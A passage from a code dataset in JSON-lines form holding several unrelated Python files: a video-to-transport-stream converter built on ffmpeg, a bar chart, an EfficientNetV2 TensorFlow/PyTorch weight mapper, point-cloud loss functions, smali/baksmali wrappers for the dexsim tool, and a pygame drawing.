int(float(file_descriptors[\"frameRate\"])) \n if fps_initial < 25: #NTSC/TV 30fps\n file_descriptors[\"frameRate\"] = 25\n pts = (int(float(file_descriptors[\"frameRate\"])) / fps_initial)\n pts = int(1)\n file_descriptors['pts'] = pts\n tempo = fps_initial / int(float(file_descriptors[\"frameRate\"]))\n file_descriptors['tempo'] = tempo\n\n print(file_descriptors)\n # command = 'ffmpeg -i {} -b:v {} -r {} -s {} -aspect {} -b:a {} {}'.format(vidFile, \n # file_descriptors[\"videoBitRate\"], file_descriptors[\"frameRate\"], \n # file_descriptors[\"resolution\"], file_descriptors[\"aspectRatio\"], \n # file_descriptors['audioBitRate'],file_descriptors[\"file_name\"])\n #command = 'ffmpeg -i {} -s 320x240 -aspect 4:3 -r 15 -c:v libx264 -c:a aac -b:a 384k {}'.format(\n\n command = \"ffmpeg -i {} -r {} {}\".format(\n vidFile, \n file_descriptors['frameRate'],\n file_descriptors[\"file_name\"])\n\n proc = subprocess.run([command], shell=True, stdout=subprocess.PIPE)\n return file_descriptors\n\ndef generateMPEG2(aviFileDescriptor):\n bit_rate = aviFileDescriptor[\"MaxRate\"] #int(aviFileDescriptor[\"videoBitRate\"])\n max_rate = aviFileDescriptor[\"MaxRate\"]\n min_rate = aviFileDescriptor[\"MaxRate\"] #aviFileDescriptor[\"audioBitRate\"]\n m2v_name = os.path.splitext(aviFileDescriptor[\"file_name\"])[0] + \".m2v\"\n\n # if os.path.exists(mpeg2_filename):\n # subprocess.run(['rm', 'mpeg2_filename'], stdout = subprocess.PIPE, stderr = stdout)\n #-r {} -filter:v 'setpts={}*PTS' -filter:a 'atempo=2'\n command = \"ffmpeg -i {} -an -s {} -deinterlace -aspect {} \" \\\n \"-filter:v 'setpts={}*PTS' \" \\\n \"-f yuv4mpegpipe - | yuvdenoise | ffmpeg -i - -an -vcodec \" \\\n \"mpeg2video -f mpeg2video -b:v {} -maxrate {} -minrate {} \" \\\n \"-bf 2 -bufsize 1343488 {}\".format(\n aviFileDescriptor[\"file_name\"], \n aviFileDescriptor[\"resolution\"],\n aviFileDescriptor[\"aspectRatio\"],\n aviFileDescriptor[\"pts\"],\n bit_rate, max_rate, \n min_rate, m2v_name)\n \n proc = subprocess.run(command,shell=True, stdout=subprocess.PIPE)\n return m2v_name\n\ndef generateVideoPES(mp2filename):\n mp2_name = mp2filename\n pes_filename = os.path.splitext(mp2_name)[0] + \".pes\"\n command = \"esvideompeg2pes {} > {}\".format(mp2_name,pes_filename)\n proc = subprocess.run(command, shell=True, stdout=subprocess.PIPE)\n\n return pes_filename\n\ndef generateVideoTS(aviFileDescriptor, pes_name): \n ts_filename = os.path.splitext(pes_name)[0] + \".ts\" \n vid_bit_rate = aviFileDescriptor['MaxRate']* (1 + 0.15)\n \n command = \"pesvideo2ts 2065 {} 112 {} 0 {} > {}\".format(\n aviFileDescriptor['frameRate'],\n vid_bit_rate, \n pes_name, \n ts_filename )\n\n proc = subprocess.run(command, shell=True, stdout=subprocess.PIPE)\n\n return ts_filename, vid_bit_rate\n\ndef extractAudioToMp2(aviFileDescriptor):\n avi_name = aviFileDescriptor['file_name']\n audio_mp2_name = os.path.splitext(vidFile)[0] + \"_audio\" + \".mp2\"\n audio_sampling_rate = \"48k\" #aviFileDescriptor[\"audioSamplingRate\"]\n audio_bitrate = \"128k\" #aviFileDescriptor[\"audioBitRate\"] \n temp = 1\n\n print(audio_sampling_rate, audio_bitrate)\n\n print(\"extracting audio....: {}\".format(audio_sampling_rate))\n command = \"ffmpeg -i {} -vn -ac 2 -acodec mp2 -f mp2 -filter:a 'atempo={}' -b:a {} -ar {} {}\".format(\n avi_name,\n temp,\n audio_bitrate, \n audio_sampling_rate, \n audio_mp2_name )\n \n subprocess.run(command, shell = True, stdout = subprocess.PIPE)\n return audio_mp2_name\n\n\ndef getAudioFrameSize(audioFileName):\n audioDescriptor = {}\n command = \"esaudioinfo \" + audioFileName\n proc = subprocess.run(command, shell=True, stdout = subprocess.PIPE)\n shell_output = proc.stdout.decode()\n all_test = shell_output.split(\"\\n\\n\")\n final_result = all_test.pop()\n final_result = all_test.pop()\n final_result = all_test.pop()\n final_result = all_test.pop()\n print(final_result)\n try:\n x,y = re.search(\"\\d+Hz\", final_result).span()\n audioDescriptor[\"sampling_rate\"] = final_result[x:y-2]\n except:\n pass\n try:\n x,y = re.search(\"\\d+\\sbytes\", final_result).span()\n audioDescriptor[\"frame_size\"] = final_result[x:y-6]\n except:\n pass\n print(audioDescriptor)\n return audioDescriptor\n\ndef generateAudioPES(audio_mp2_name, audioDescriptor):\n audio_framesize = audioDescriptor['frame_size']\n audio_sampling_rate = audioDescriptor['sampling_rate'] \n audio_pes_name = os.path.splitext(vidFile)[0] + \"_audio\" + \".pes\"\n pts_step = ()\n\n command = \"esaudio2pes {} 1152 {} {} -1 3600 > {}\".format(\n audio_mp2_name,\n audio_framesize,\n audio_sampling_rate,\n audio_pes_name )\n\n subprocess.run(command, shell = True, stdout = subprocess.PIPE)\n return audio_pes_name\n\ndef generateAudioTS(audio_pes_name, audioDescriptor):\n audio_sampling_rate = audioDescriptor['sampling_rate'] \n audio_ts_name = os.path.splitext(vidFile)[0] + \"_audio\" + \".ts\"\n\n command = \"pesaudio2ts 2075 1152 {} {} 0 {} > {}\".format(\n audio_sampling_rate, \n audioDescriptor['frame_size'],\n audio_pes_name,\n audio_ts_name )\n\n subprocess.run(command, shell = True, stdout = subprocess.PIPE)\n return audio_ts_name, 188000 # refer to avalpa manual\n\ndef muxTS():\n command = \"tscbmuxer b:{} sample.ts b:{} \"\nif __name__ == \"__main__\":\n vidFile = sys.argv[1]\n ocdir_rate = int(sys.argv[2])\n\n vid_ids = getVideoID(vidFile) #working\n aviFileDescriptor = generateAVI(vid_ids) #working\n mp2FileName = generateMPEG2(aviFileDescriptor) #working\n\n\n pes_name = generateVideoPES(mp2FileName) \n video_ts_name, video_ts_bitrate = generateVideoTS(aviFileDescriptor,pes_name)\n \n\n audio_mp2_name = extractAudioToMp2(aviFileDescriptor)\n audioDescriptor = getAudioFrameSize(audio_mp2_name)\n\n audio_pes_name = generateAudioPES(audio_mp2_name, audioDescriptor)\n print(\"generate audio ts\")\n audio_ts_name, audio_ts_bitrate = generateAudioTS(audio_pes_name, audioDescriptor)\n\n\n\n\n\n\n\n\n","repo_name":"robot-1/vidtots","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":7926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2045790919","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef bar_anal(bitcoin):\n plt.xticks(())\n plt.yticks(())\n bar_cnt = np.arange(7)\n dic = ['mean', 'std', 'var', 'min', 'max', 'argmin', 'argmax']\n Y = np.array([np.mean(bitcoin), np.std(bitcoin), np.var(bitcoin), np.min(bitcoin), np.max(bitcoin), np.argmin(bitcoin), np.argmax(bitcoin)])\n plt.bar(bar_cnt, Y, facecolor = '#9999ff', edgecolor = 'white')\n for x, y in zip(bar_cnt, Y):\n plt.text(x + 0.4, y +0.05, '%s : %.2f' %(dic[x] ,y), ha = 'center', va = 'bottom')\n plt.show()\n\n","repo_name":"loserofeverything/mcm_day01","sub_path":"myplot.py","file_name":"myplot.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"42201621345","text":"import os\n\nimport tensorflow as tf\nimport torch\n\nfrom deepvision.layers import fused_mbconv\nfrom deepvision.layers import mbconv\nfrom deepvision.layers.fused_mbconv import __FusedMBConvPT\nfrom deepvision.layers.fused_mbconv import __FusedMBConvTF\nfrom deepvision.layers.mbconv import __MBConvPT\nfrom deepvision.layers.mbconv import __MBConvTF\nfrom deepvision.models.classification.efficientnet.efficientnetv2 import (\n EfficientNetV2B0,\n)\nfrom deepvision.models.classification.efficientnet.efficientnetv2 import (\n EfficientNetV2B1,\n)\nfrom deepvision.models.classification.efficientnet.efficientnetv2 import (\n EfficientNetV2B2,\n)\nfrom deepvision.models.classification.efficientnet.efficientnetv2 import (\n EfficientNetV2B3,\n)\nfrom deepvision.models.classification.efficientnet.efficientnetv2 import EfficientNetV2L\nfrom deepvision.models.classification.efficientnet.efficientnetv2 import EfficientNetV2M\nfrom deepvision.models.classification.efficientnet.efficientnetv2 import EfficientNetV2S\nfrom deepvision.models.classification.efficientnet.efficientnetv2_pt import (\n EfficientNetV2PT,\n)\nfrom deepvision.models.classification.efficientnet.efficientnetv2_tf import (\n EfficientNetV2TF,\n)\n\nMODEL_ARCHITECTURES = {\n \"EfficientNetV2B0\": EfficientNetV2B0,\n \"EfficientNetV2B1\": EfficientNetV2B1,\n \"EfficientNetV2B2\": EfficientNetV2B2,\n \"EfficientNetV2B3\": EfficientNetV2B3,\n \"EfficientNetV2S\": EfficientNetV2S,\n \"EfficientNetV2M\": EfficientNetV2M,\n \"EfficientNetV2L\": EfficientNetV2L,\n}\n\nMODEL_BACKBONES = {\"tensorflow\": EfficientNetV2TF, \"pytorch\": EfficientNetV2PT}\n\n\ndef load_tf_to_pt(\n filepath,\n dummy_input,\n kwargs=None,\n freeze_bn=True,\n):\n \"\"\"\n Basic usage:\n\n ```\n dummy_input_tf = tf.ones([1, 224, 224, 3])\n dummy_input_torch = torch.ones(1, 3, 224, 224)\n\n tf_model = deepvision.models.EfficientNetV2B0(include_top=False,\n pooling='avg',\n input_shape=(224, 224, 3),\n backend='tensorflow')\n\n tf_model.save('effnet.h5')\n\n from deepvision.models.classification.efficientnet import efficientnet_weight_mapper\n pt_model = efficientnet_weight_mapper.load_tf_to_pt(filepath='effnet.h5', dummy_input=dummy_input_tf)\n\n print(tf_model(dummy_input_tf)['output'].numpy())\n print(pt_model(dummy_input_torch).detach().cpu().numpy())\n # True\n np.allclose(tf_model(dummy_input_tf)['output'].numpy(), pt_model(dummy_input_torch).detach().cpu().numpy())\n \"\"\"\n with torch.no_grad():\n # Temporarily need to supply this as custom_objects() due to a bug while\n # saving Functional Subclassing models\n model = tf.keras.models.load_model(\n filepath, custom_objects={\"EfficientNetV2TF\": EfficientNetV2TF}\n )\n # Run dummy_input through the model to initialize\n # model.variables\n model(dummy_input)\n\n model_config = model.get_config()\n target_model = EfficientNetV2PT(\n include_top=model_config[\"include_top\"],\n classes=model_config[\"classes\"],\n input_shape=tf.transpose(tf.squeeze(dummy_input), (2, 0, 1)).shape,\n pooling=model_config[\"pooling\"],\n width_coefficient=model_config[\"width_coefficient\"],\n depth_coefficient=model_config[\"depth_coefficient\"],\n blockwise_kernel_sizes=model_config[\"blockwise_kernel_sizes\"],\n blockwise_num_repeat=model_config[\"blockwise_num_repeat\"],\n blockwise_input_filters=model_config[\"blockwise_input_filters\"],\n blockwise_output_filters=model_config[\"blockwise_output_filters\"],\n blockwise_expand_ratios=model_config[\"blockwise_expand_ratios\"],\n blockwise_se_ratios=model_config[\"blockwise_se_ratios\"],\n blockwise_strides=model_config[\"blockwise_strides\"],\n blockwise_conv_type=model_config[\"blockwise_conv_type\"],\n )\n # Copy stem\n target_model.stem_conv.weight.data = torch.nn.Parameter(\n torch.from_numpy(tf.transpose(model.layers[1].kernel, (3, 2, 0, 1)).numpy())\n )\n # Copy BatchNorm\n target_model.stem_bn.weight.data = torch.nn.Parameter(\n torch.from_numpy(model.layers[2].gamma.numpy())\n )\n target_model.stem_bn.bias.data = torch.nn.Parameter(\n torch.from_numpy(model.layers[2].beta.numpy())\n )\n target_model.stem_bn.running_mean.data = torch.nn.Parameter(\n torch.from_numpy(model.layers[2].moving_mean.numpy())\n )\n target_model.stem_bn.running_var.data = torch.nn.Parameter(\n torch.from_numpy(model.layers[2].moving_variance.numpy())\n )\n\n tf_blocks = [\n block\n for block in model.layers\n if isinstance(block, __FusedMBConvTF) or isinstance(block, __MBConvTF)\n ]\n\n for pt_block, tf_block in zip(target_model.blocks, tf_blocks):\n if isinstance(tf_block, __FusedMBConvTF):\n converted_block = fused_mbconv.tf_to_pt(tf_block)\n pt_block.load_state_dict(converted_block.state_dict())\n if isinstance(tf_block, __MBConvTF):\n converted_block = mbconv.tf_to_pt(tf_block)\n pt_block.load_state_dict(converted_block.state_dict())\n\n target_model.top_conv.weight.data = torch.nn.Parameter(\n torch.from_numpy(\n tf.transpose(\n model.layers[-5 if model_config[\"include_top\"] else -4].kernel,\n (3, 2, 0, 1),\n ).numpy()\n )\n )\n if model_config[\"include_top\"]:\n # Copy top BatchNorm\n target_model.top_bn.weight.data = torch.nn.Parameter(\n torch.from_numpy(model.layers[-4].gamma.numpy())\n )\n target_model.top_bn.bias.data = torch.nn.Parameter(\n torch.from_numpy(model.layers[-4].beta.numpy())\n )\n target_model.top_bn.running_mean.data = torch.nn.Parameter(\n torch.from_numpy(model.layers[-4].moving_mean.numpy())\n )\n target_model.top_bn.running_var.data = torch.nn.Parameter(\n torch.from_numpy(model.layers[-4].moving_variance.numpy())\n )\n\n # Copy head\n target_model.top_dense.weight.data = torch.nn.Parameter(\n torch.from_numpy(model.layers[-1].kernel.numpy().transpose(1, 0))\n )\n target_model.top_dense.bias.data = torch.nn.Parameter(\n torch.from_numpy(model.layers[-1].bias.numpy())\n )\n\n \"\"\"\n As noted in: https://discuss.pytorch.org/t/out-of-memory-error-when-resume-training-even-though-my-gpu-is-empty/30757/5\n Sometimes, on some devices, PyTorch-based networks throw a CUDA OOM when loaded directly on the GPU. To avoid this,\n we now *save* the model and load it back, mapping to the CPU and then pushing back to the original model device.\n \"\"\"\n device = target_model.device\n original_filepath = os.path.splitext(filepath)[0]\n target_model.to(\"cpu\")\n torch.save(target_model.state_dict(), f\"converted_{original_filepath}.pt\")\n\n target_model.load_state_dict(\n torch.load(f\"converted_{original_filepath}.pt\", map_location=\"cpu\"),\n )\n target_model.to(device)\n target_model.zero_grad()\n\n if freeze_bn:\n # Freeze all BatchNorm2d layers\n for module in target_model.modules():\n if isinstance(module, torch.nn.BatchNorm2d):\n module.eval()\n module.weight.requires_grad = False\n module.bias.requires_grad = False\n\n return target_model\n\n\ndef load_pt_to_tf(\n filepath,\n dummy_input,\n kwargs=None,\n architecture=None,\n freeze_bn=True,\n):\n \"\"\"\n Basic usage:\n\n ```\n dummy_input_tf = tf.ones([1, 224, 224, 3])\n dummy_input_torch = torch.ones(1, 3, 224, 224)\n\n pt_model = deepvision.models.EfficientNetV2B0(include_top=False,\n pooling='avg',\n input_shape=(3, 224, 224),\n backend='pytorch')\n torch.save(pt_model.state_dict(), 'effnet.pt')\n\n from deepvision.models.classification.efficientnet import efficientnet_weight_mapper\n\n kwargs = {'include_top': False, 'pooling':'avg', 'input_shape':(3, 224, 224)}\n tf_model = efficientnet_weight_mapper.load_pt_to_tf(filepath='effnet.pt',\n architecture='EfficientNetV2B0',\n kwargs=kwargs,\n dummy_input=dummy_input_torch)\n\n\n pt_model.eval()\n print(pt_model(dummy_input_torch).detach().cpu().numpy())\n print(tf_model(dummy_input_tf)['output'].numpy())\n # True\n np.allclose(tf_model(dummy_input_tf)['output'].numpy(), pt_model(dummy_input_torch).detach().cpu().numpy())\n ```\n \"\"\"\n\n if kwargs is None:\n raise ValueError(\n f\"'kwargs' cannot be None, and are required for PyTorch model construction.\"\n )\n if architecture is None:\n raise ValueError(\n f\"'architecture' cannot be None, and is required for PyTorch model construction.\"\n )\n with torch.no_grad():\n model = MODEL_ARCHITECTURES.get(architecture)\n model = model(backend=\"pytorch\", **kwargs)\n model.load_state_dict(torch.load(filepath))\n\n model_config = model.get_config()\n target_model = EfficientNetV2TF(\n include_top=model_config[\"include_top\"],\n classes=model_config[\"classes\"],\n input_shape=dummy_input.squeeze(0).permute(1, 2, 0).shape,\n pooling=model_config[\"pooling\"],\n width_coefficient=model_config[\"width_coefficient\"],\n depth_coefficient=model_config[\"depth_coefficient\"],\n blockwise_kernel_sizes=model_config[\"blockwise_kernel_sizes\"],\n blockwise_num_repeat=model_config[\"blockwise_num_repeat\"],\n blockwise_input_filters=model_config[\"blockwise_input_filters\"],\n blockwise_output_filters=model_config[\"blockwise_output_filters\"],\n blockwise_expand_ratios=model_config[\"blockwise_expand_ratios\"],\n blockwise_se_ratios=model_config[\"blockwise_se_ratios\"],\n blockwise_strides=model_config[\"blockwise_strides\"],\n blockwise_conv_type=model_config[\"blockwise_conv_type\"],\n )\n dummy_input = tf.convert_to_tensor(\n dummy_input.permute(0, 2, 3, 1).detach().cpu().numpy()\n )\n # Run dummy_input through the model to initialize\n # model.variables\n target_model(dummy_input)\n\n # Copy stem\n target_model.layers[1].kernel.assign(\n tf.convert_to_tensor(\n model.stem_conv.weight.data.permute(2, 3, 1, 0).detach().cpu().numpy()\n )\n )\n\n # Copy BatchNorm\n target_model.layers[2].gamma.assign(\n tf.convert_to_tensor(model.stem_bn.weight.data.detach().cpu().numpy())\n )\n\n target_model.layers[2].beta.assign(\n tf.convert_to_tensor(model.stem_bn.bias.data.detach().cpu().numpy())\n )\n\n target_model.layers[2].moving_mean.assign(\n tf.convert_to_tensor(model.stem_bn.running_mean.data.detach().cpu().numpy())\n )\n\n target_model.layers[2].moving_variance.assign(\n tf.convert_to_tensor(model.stem_bn.running_var.data.detach().cpu().numpy())\n )\n\n tf_blocks = [\n block\n for block in target_model.layers\n if isinstance(block, __FusedMBConvTF) or isinstance(block, __MBConvTF)\n ]\n\n for tf_block, pt_block in zip(tf_blocks, model.blocks):\n if isinstance(pt_block, __FusedMBConvPT):\n converted_block = fused_mbconv.pt_to_tf(pt_block)\n tf_block.set_weights(converted_block.weights)\n if isinstance(pt_block, __MBConvPT):\n converted_block = mbconv.pt_to_tf(pt_block)\n tf_block.set_weights(converted_block.weights)\n\n target_model.layers[-5 if model_config[\"include_top\"] else -4].kernel.assign(\n tf.convert_to_tensor(\n model.top_conv.weight.data.permute(2, 3, 1, 0).detach().cpu().numpy()\n )\n )\n\n if model_config[\"include_top\"]:\n # Copy top BatchNorm\n target_model.layers[-4].gamma.assign(\n tf.convert_to_tensor(model.top_bn.weight.data.detach().cpu().numpy())\n )\n\n target_model.layers[-4].beta.assign(\n tf.convert_to_tensor(model.top_bn.bias.data.detach().cpu().numpy())\n )\n\n target_model.layers[-4].moving_mean.assign(\n tf.convert_to_tensor(\n model.top_bn.running_mean.data.detach().cpu().numpy()\n )\n )\n\n target_model.layers[-4].moving_variance.assign(\n tf.convert_to_tensor(\n model.top_bn.running_var.data.detach().cpu().numpy()\n )\n )\n\n # Copy head\n target_model.layers[-1].kernel.assign(\n tf.convert_to_tensor(\n model.top_dense.weight.data.permute(1, 0).detach().cpu().numpy()\n )\n )\n\n target_model.layers[-1].bias.assign(\n tf.convert_to_tensor(model.top_dense.bias.data.detach().cpu().numpy())\n )\n\n if freeze_bn:\n # Freeze all BatchNorm2d layers\n for layer in target_model.layers:\n if isinstance(layer, tf.keras.layers.BatchNormalization):\n layer.trainable = False\n\n return target_model\n","repo_name":"DavidLandup0/deepvision","sub_path":"deepvision/models/classification/efficientnet/efficientnet_weight_mapper.py","file_name":"efficientnet_weight_mapper.py","file_ext":"py","file_size_in_byte":13908,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"16"} +{"seq_id":"39343165280","text":"import numpy as np\nimport torch\nimport torch.nn as nn\n\nfrom geomloss import SamplesLoss\n\nimport open3d as o3d\n\n\ndef chamfer_distance(x, y):\n x_ = torch.unsqueeze(x, dim=1)\n y_ = torch.unsqueeze(y, dim=2)\n distances = torch.sum((x_ - y_)**2, dim=3)\n # print(distances.shape)\n # print(torch.min(distances, dim=2)[1].shape)\n chamfer = torch.mean(torch.min(distances, dim=1)[0], dim=1) + torch.mean(torch.min(distances, dim=2)[0], dim=1)\n # print(chamfer.shape)\n return chamfer\n\n\ndef earth_mover_distance(x, y):\n bs, num_points_x, points_dim = x.size()\n _, num_points_y, _ = y.size()\n batch_EMD = 0\n # 近似计算\n L = SamplesLoss(loss='sinkhorn', p=1, blur=.05)\n for i in range(bs):\n loss = L(x[i], y[i])\n batch_EMD += loss\n emd = batch_EMD / bs\n return emd\n\n\nclass ChamferDistance(nn.Module):\n def __init__(self):\n super().__init__()\n\n def forward(self, xyz1, xyz2):\n \"\"\"\n Args:\n xyz1: tensor with size of (B, N, 3)\n xyz2: tensor with size of (B, M, 3)\n \"\"\"\n cd = chamfer_distance(xyz1, xyz2)\n # print(cd)\n return cd\n # return torch.from_numpy(cd)\n\n\nclass EarthMoverDistance(nn.Module):\n def __init__(self):\n # super().__init__()\n super(EarthMoverDistance, self).__init__()\n\n def forward(self, xyz1, xyz2):\n \"\"\"\n Args:\n xyz1: tensor with size of (B, N, 3)\n xyz2: tensor with size of (B, M, 3)\n \"\"\"\n emd = earth_mover_distance(xyz1, xyz2)\n return emd\n\n\nCD = ChamferDistance()\nEMD = EarthMoverDistance()\n\n\ndef cd_loss(pcs1, pcs2):\n \"\"\"\n L1 Chamfer Distance.\n\n Args:\n pcs1 (torch.tensor): (B, N, 3)\n pcs2 (torch.tensor): (B, M, 3)\n \"\"\"\n return torch.mean(CD(pcs1, pcs2))\n\n\ndef emd_loss(pcs1, pcs2):\n \"\"\"\n EMD Loss.\n\n Args:\n pcs1 (torch.Tensor): (B, N, 3)\n pcs2 (torch.Tensor): (B, N, 3)\n \"\"\"\n return torch.mean(EMD(pcs1, pcs2))\n\n\n\nclass ChamferLoss(nn.Module):\n\n def __init__(self):\n super(ChamferLoss, self).__init__()\n self.use_cuda = torch.cuda.is_available()\n\n def forward(self, preds, gts):\n P = self.batch_pairwise_dist(gts, preds)\n mins, _ = torch.min(P, 1)\n loss_1 = torch.sum(mins)\n mins, _ = torch.min(P, 2)\n loss_2 = torch.sum(mins)\n\n return loss_1 + loss_2\n\n def batch_pairwise_dist(self, x, y):\n bs, num_points_x, points_dim = x.size()\n _, num_points_y, _ = y.size()\n xx = torch.bmm(x, x.transpose(2, 1))\n yy = torch.bmm(y, y.transpose(2, 1))\n zz = torch.bmm(x, y.transpose(2, 1))\n if self.use_cuda:\n dtype = torch.cuda.LongTensor\n else:\n dtype = torch.LongTensor\n diag_ind_x = torch.arange(0, num_points_x).type(dtype)\n diag_ind_y = torch.arange(0, num_points_y).type(dtype)\n # brk()\n rx = xx[:, diag_ind_x, diag_ind_x].unsqueeze(1).expand_as(zz.transpose(2, 1))\n ry = yy[:, diag_ind_y, diag_ind_y].unsqueeze(1).expand_as(zz)\n P = (rx.transpose(2, 1) + ry - 2 * zz)\n\n return P\n\nCD2 = ChamferLoss()\n\n\nclass Fs(nn.Module):\n def __init__(self):\n # super().__init__()\n super(Fs, self).__init__()\n\n def forward(self, xyz1, xyz2, th):\n \"\"\"\n Args:\n xyz1: tensor with size of (B, N, 3)\n xyz2: tensor with size of (B, M, 3)\n \"\"\"\n return self.t_f_s(xyz1, xyz2, th)\n\n def f_score(self, x, y, th=0.01):\n bs, num_points_x, points_dim = x.size()\n _, num_points_y, _ = y.size()\n batch_f = 0\n\n for i in range(bs):\n pred, gt = x[i].detach().cpu().numpy(), y[i].detach().cpu().numpy()\n # pred, gt = x[i].cpu().numpy(), y[i].cpu().numpy()\n # pred, gt = x[i], y[i]\n\n pred = o3d.geometry.PointCloud(o3d.utility.Vector3dVector(pred))\n gt = o3d.geometry.PointCloud(o3d.utility.Vector3dVector(gt))\n\n dist1 = pred.compute_point_cloud_distance(gt)\n dist2 = gt.compute_point_cloud_distance(pred)\n\n recall = float(sum(d < th for d in dist2)) / float(len(dist2))\n precision = float(sum(d < th for d in dist1)) / float(len(dist1))\n\n loss = 2 * recall * precision / (recall + precision) if recall + precision else 0\n\n batch_f += loss\n\n return torch.tensor(batch_f / bs)\n\n def t_f_s(self, x, y, th=0.1):\n bs, num_points, points_dim = x.size()\n\n x_ = torch.unsqueeze(x, dim=1)\n y_ = torch.unsqueeze(y, dim=2)\n distances = torch.sum((x_ - y_) ** 2, dim=3)\n # print(distances.shape)\n # print(torch.min(distances, dim=2)[1].shape)\n # chamfer = torch.mean(torch.min(distances, dim=1)[0], dim=1) + torch.mean(torch.min(distances, dim=2)[0], dim=1)\n\n d1 = torch.min(distances, dim=1)[0]\n d2 = torch.min(distances, dim=2)[0]\n\n d1[torch.where(d1.le(th))] = 0\n # d1[torch.where(d1.gt(th))] = 1\n\n d2[torch.where(d2.le(th))] = 0\n # d2[torch.where(d2.gt(th))] = 1\n\n chamfer = torch.mean(d1, dim=1) + torch.mean(d2, dim=1)\n\n return chamfer\n\n d1 = torch.sum(d1, dim=1)\n\n d2 = torch.sum(d2, dim=1)\n\n # return (d1.le(th).sum() + d2.le(th).sum()) / (2*bs*num_points)\n\n # d1.le(th).sum() + d2.le(th).sum()\n # print(d1.shape)\n\n # print(d1+d2)\n # print(2*num_points-(d1+d2))\n\n return torch.mean(d1+d2) / (2*num_points)\n\n\n\nfs = Fs()\n\n\ndef fs_loss(xyz1, xyz2, th):\n\n return torch.mean(fs(xyz1, xyz2, th))\n\n\n\nif __name__ == '__main__':\n\n pc1 = torch.rand(2, 2048, 3)\n pc2 = torch.rand(2, 2048, 3)\n\n print(fs(pc1, pc2, 0.001))\n\n\n import open3d as o3d\n\n source_points = pc1.numpy()[0]\n target_points = pc2.numpy()[0]\n\n print(source_points.shape)\n\n source = o3d.geometry.PointCloud()\n source.points = o3d.utility.Vector3dVector(source_points)\n\n target = o3d.geometry.PointCloud()\n target.points = o3d.utility.Vector3dVector(target_points)\n\n\n dist1 = source.compute_point_cloud_distance(target)\n dist2 = target.compute_point_cloud_distance(source)\n print(np.array(dist1).shape)\n\n print(source_points)\n print(target_points)\n\n print(np.array(dist1))\n print(np.array(dist2))\n\n print((np.mean(np.array(dist1)**2) + np.mean(np.array(dist2)**2)))\n\n print(CD2(pc1, pc2))\n\n print(CD2(pc1, pc2).item()/2048)\n\n print(cd_loss(pc1, pc2).item())\n # print(emd_loss(pc1, pc2))]\n\n","repo_name":"Miss-wzx/UPCC","sub_path":"metrics/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":6545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29355518274","text":"import os\nimport shutil\nimport subprocess\nfrom dexsim.settings import JAVA_PATH, BAKSMALI_PATH, SMALI_PATH, FILTERS_LIST\n\n\ndef baksmali(dex_file, output_dir='out'):\n \"\"\"\n dex to smali\n \"\"\"\n cmd = '{} -jar {} d {} -o {}'.format(JAVA_PATH, BAKSMALI_PATH, dex_file, output_dir)\n print(cmd)\n\n subprocess.call(cmd, shell=True)\n\n for line in FILTERS_LIST:\n clz = line.split('#')[0]\n xpath = output_dir + os.sep + clz.replace('.', os.sep).strip('\\n')\n if os.path.exists(xpath):\n shutil.rmtree(xpath)\n\n return output_dir\n\n\ndef smali(smali_dir, output_file='out.dex'):\n \"\"\"\n smali to dex\n \"\"\"\n cmd = '{} -jar {} a {} -o {}'.format(JAVA_PATH,SMALI_PATH, smali_dir, output_file)\n print(cmd)\n\n subprocess.call(cmd, shell=True)\n\n return output_file\n\n","repo_name":"0x90/dexsim","sub_path":"dexsim/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"35816637154","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\ndef calculate(m):\n for i in reversed(range(0,len(m)-1)):\n for j in range(0,len(m[i])):\n d = max(m[i+1][j], m[i+1][j+1])\n m[i][j] += d\n return m[0][0]\n\ndef read_file(s):\n f = open(s)\n line = f.readline()\n m = []\n while line:\n m.append(list(map(int,line.split(' '))))\n line = f.readline()\n f.close()\n return m\n\nm = read_file(\"18.txt\")\n\nprint(calculate(m))\n","repo_name":"PandaDrunkard/proex","sub_path":"euler/0/18.py","file_name":"18.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74209548488","text":"import pygame\nfrom pygame.draw import *\n\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nSUN_BORDER = (255, 255, 128)\nSUN_COLOR = (255, 255, 192)\nSKY = (0, 255, 255)\nWATER = (22, 80, 68)\nGRAY = (32, 32, 32)\n\n\ndef draw_sun(x, y, r):\n line(screen, SUN_COLOR, (x - r, y), (x + r, y), r // 10)\n line(screen, SUN_COLOR, (x, y - r), (x, y + r), r // 10)\n circle(screen, SUN_BORDER, (x, y), r // 10, 0)\n circle(screen, SUN_BORDER, (x, y), r, r // 10)\n\n\ndef draw_hole(surface, x, y, r):\n s = (1 - r // abs(r)) // 2\n r0 = abs(r)\n\n ellipse(surface, GRAY, [x - (5 * r) // 2 + 5 * r * s, y - (3 * r0) // 4, 5 * r0, (11 * r0) // 8], 0)\n ellipse(surface, WATER, [x - 2 * r + 4 * r * s, y - r0 // 2, 4 * r0, r0], 0)\n\n\ndef draw_ear(surface, x, y, r):\n s = (1 - r // abs(r)) // 2\n r0 = abs(r)\n\n circle(surface, WHITE, (x, y), r0, 0)\n circle(surface, BLACK, (x, y), r0, 1)\n rect(surface, WHITE, [x - r // 2 + (3 * r * s) // 2, y, (3 * r0) // 2, r0], 0)\n\n\ndef draw_head(surface, x, y, r):\n s = (1 - r // abs(r)) // 2\n r0 = abs(r)\n\n ellipse(surface, WHITE, [x + 6 * r * s, y, 6 * r0, 3 * r0], 0)\n ellipse(surface, BLACK, [x + 6 * r * s, y, 6 * r0, 3 * r0], 1)\n\n # mouth\n ellipse(surface, BLACK, [x + 3 * r + (5 * r * s) // 2, y + 2 * r0, (5 * r0) // 2, (2 * r0) // 5], 1)\n rect(surface, WHITE, [x + 3 * r + (5 * r * s) // 2, y + 2 * 